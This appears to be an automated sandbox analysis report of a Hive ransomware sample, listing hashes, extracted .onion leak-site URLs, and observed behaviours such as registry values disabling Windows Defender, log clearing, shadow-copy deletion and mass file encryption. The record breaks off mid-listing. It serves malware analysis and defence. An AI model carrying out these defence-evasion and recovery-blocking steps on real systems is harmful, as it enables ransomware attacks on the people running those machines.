Analysis
-
max time kernel
144s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 04:52
Static task
static1
Behavioral task
behavioral1
Sample
a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
-
Size
2.1MB
-
MD5
a0b0432294ebbc84d306993e2e7ea91c
-
SHA1
217f15f8048cb52b529bcad20c687422c9a29add
-
SHA256
1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3
-
SHA512
1dc1884893156b400f5c9aa0c7a922ca6a06758771f70a560c82f2b3078ae2fde9b21b797236e4d7dcd3db866d3afee18b6acee3124224c5b0aca8376afced61
-
SSDEEP
49152:0Whc2Iyefi4Cvv5mGb9dPaBq9MuAp3JwMLerDclJyA:9Qq6gz95Ap3JBeAJyA
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\eTbd_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 864 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 928 wevtutil.exe 2212 wevtutil.exe 1776 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1748 bcdedit.exe 752 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_DTQy7J5xylQ0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_5GHBroXqNcM0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_Ud_Zwscj0kU0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_gd_w6WPgRtc0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7__ULRmotqZNo0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_kr_NlYYVdGQ0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_q5H2r34iXwE0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_GBORwiA995k0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_G6-EKFAwH0E0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_qT1Sn_mjE_k0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\library.js a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mip.exe.mui a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_yrx-eZsP1aY0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_EO9DbOE0IsM0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_Uo3nTnVjeRE0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\gadget.xml a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_zNRP9tfbke40.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14655_.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_iQcu6qAvXCc0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR10F.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_w-vKqSYjNA40.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_J7XI6ME8iSQ0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Casual.css.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_f4JGK0ItW9c0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0086420.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_1SMXD6WSsIY0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\FUNCRES.XLAM.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_vCgN64HeMhE0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBARBLL.DPV.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_zSXLWkUQ0uk0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_IGCEa7jWhAI0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_GRiel5aaVtc0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_tr-7QrgeTOY0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_soVjT6cI9Oo0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_m8LFINx1-6Y0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_C3PgwonXso40.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\WMPSideShowGadget.exe.mui a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47B.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_Gn8b6rQbD8g0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_Ft40iY3CM8g0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\eTbd_HOW_TO_DECRYPT.txt a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_8I2czW6ipgk0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_y1ManbIQ0ak0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\THMBNAIL.PNG.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_xNjMymINN6E0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_lbyAOdbeMHg0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\eTbd_HOW_TO_DECRYPT.txt a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_xtGwsS9BjxM0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_rSNuLVT5ntg0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_2gQa8q5C16w0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_D4EWGJnzoE00.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_pjLSwdEaSSk0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\AMERITECH.NET.XML.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_rKct7BLQIcU0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre7\LICENSE.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_h3xmGZKkZlU0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_gY-MmKmjXp40.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_LusCLHUF1Ic0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\eTbd_HOW_TO_DECRYPT.txt a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\eTbd_HOW_TO_DECRYPT.txt a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15173_.GIF.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_6JbAe62Q9PU0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_yaLdwRr2iMk0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MENU.XML.u5raQxLyy1x3H5jualA5TXh5ASsepVlF_9Sb7IS3Kk7_NwnShtf7awA0.rwbwj a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1488 sc.exe 2368 sc.exe 2428 sc.exe 2896 sc.exe 2036 sc.exe 1760 sc.exe 656 sc.exe 436 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 972 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exea0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exepid process 1732 powershell.exe 2640 powershell.exe 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 928 wevtutil.exe Token: SeBackupPrivilege 928 wevtutil.exe Token: SeSecurityPrivilege 2212 wevtutil.exe Token: SeBackupPrivilege 2212 wevtutil.exe Token: SeSecurityPrivilege 1776 wevtutil.exe Token: SeBackupPrivilege 1776 wevtutil.exe Token: SeIncreaseQuotaPrivilege 620 wmic.exe Token: SeSecurityPrivilege 620 wmic.exe Token: SeTakeOwnershipPrivilege 620 wmic.exe Token: SeLoadDriverPrivilege 620 wmic.exe Token: SeSystemProfilePrivilege 620 wmic.exe Token: SeSystemtimePrivilege 620 wmic.exe Token: SeProfSingleProcessPrivilege 620 wmic.exe Token: SeIncBasePriorityPrivilege 620 wmic.exe Token: SeCreatePagefilePrivilege 620 wmic.exe Token: SeBackupPrivilege 620 wmic.exe Token: SeRestorePrivilege 620 wmic.exe Token: SeShutdownPrivilege 620 wmic.exe Token: SeDebugPrivilege 620 wmic.exe Token: SeSystemEnvironmentPrivilege 620 wmic.exe Token: SeRemoteShutdownPrivilege 620 wmic.exe Token: SeUndockPrivilege 620 wmic.exe Token: SeManageVolumePrivilege 620 wmic.exe Token: 33 620 wmic.exe Token: 34 620 wmic.exe Token: 35 620 wmic.exe Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe Token: SeSystemProfilePrivilege 1968 wmic.exe Token: SeSystemtimePrivilege 1968 wmic.exe Token: SeProfSingleProcessPrivilege 1968 wmic.exe Token: SeIncBasePriorityPrivilege 1968 wmic.exe Token: SeCreatePagefilePrivilege 1968 wmic.exe Token: SeBackupPrivilege 1968 wmic.exe Token: SeRestorePrivilege 1968 wmic.exe Token: SeShutdownPrivilege 1968 wmic.exe Token: SeDebugPrivilege 1968 wmic.exe Token: SeSystemEnvironmentPrivilege 1968 wmic.exe Token: SeRemoteShutdownPrivilege 1968 wmic.exe Token: SeUndockPrivilege 1968 wmic.exe Token: SeManageVolumePrivilege 1968 wmic.exe Token: 33 1968 wmic.exe Token: 34 1968 wmic.exe Token: 35 1968 wmic.exe Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe Token: SeSystemProfilePrivilege 1968 wmic.exe Token: SeSystemtimePrivilege 1968 wmic.exe Token: SeProfSingleProcessPrivilege 1968 wmic.exe Token: SeIncBasePriorityPrivilege 1968 wmic.exe Token: SeCreatePagefilePrivilege 1968 wmic.exe Token: SeBackupPrivilege 1968 wmic.exe Token: SeRestorePrivilege 1968 wmic.exe Token: SeShutdownPrivilege 1968 wmic.exe Token: SeDebugPrivilege 1968 wmic.exe Token: SeSystemEnvironmentPrivilege 1968 wmic.exe Token: SeRemoteShutdownPrivilege 1968 wmic.exe Token: SeUndockPrivilege 1968 wmic.exe Token: SeManageVolumePrivilege 1968 wmic.exe Token: 33 1968 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2852 wrote to memory of 1616 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 1616 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 1616 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 1616 wrote to memory of 2652 1616 net.exe net1.exe PID 1616 wrote to memory of 2652 1616 net.exe net1.exe PID 1616 wrote to memory of 2652 1616 net.exe net1.exe PID 2852 wrote to memory of 2084 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2084 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2084 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2084 wrote to memory of 2964 2084 net.exe net1.exe PID 2084 wrote to memory of 2964 2084 net.exe net1.exe PID 2084 wrote to memory of 2964 2084 net.exe net1.exe PID 2852 wrote to memory of 2936 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2936 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2936 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2936 wrote to memory of 2588 2936 net.exe net1.exe PID 2936 wrote to memory of 2588 2936 net.exe net1.exe PID 2936 wrote to memory of 2588 2936 net.exe net1.exe PID 2852 wrote to memory of 2564 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2564 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2564 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2564 wrote to memory of 2640 2564 net.exe net1.exe PID 2564 wrote to memory of 2640 2564 net.exe net1.exe PID 2564 wrote to memory of 2640 2564 net.exe net1.exe PID 2852 wrote to memory of 2572 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2572 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2572 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2572 wrote to memory of 2476 2572 net.exe net1.exe PID 2572 wrote to memory of 2476 2572 net.exe net1.exe PID 2572 wrote to memory of 2476 2572 net.exe net1.exe PID 2852 wrote to memory of 2608 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2608 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2608 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2608 wrote to memory of 2360 2608 net.exe net1.exe PID 2608 wrote to memory of 2360 2608 net.exe net1.exe PID 2608 wrote to memory of 2360 2608 net.exe net1.exe PID 2852 wrote to memory of 2956 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2956 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2956 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2956 wrote to memory of 1672 2956 net.exe net1.exe PID 2956 wrote to memory of 1672 2956 net.exe net1.exe PID 2956 wrote to memory of 1672 2956 net.exe net1.exe PID 2852 wrote to memory of 2600 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2600 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2852 wrote to memory of 2600 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe net.exe PID 2600 wrote to memory of 2348 2600 net.exe net1.exe PID 2600 wrote to memory of 2348 2600 net.exe net1.exe PID 2600 wrote to memory of 2348 2600 net.exe net1.exe PID 2852 wrote to memory of 2368 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2368 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2368 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2428 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2428 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2428 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2896 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2896 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2896 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2036 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe 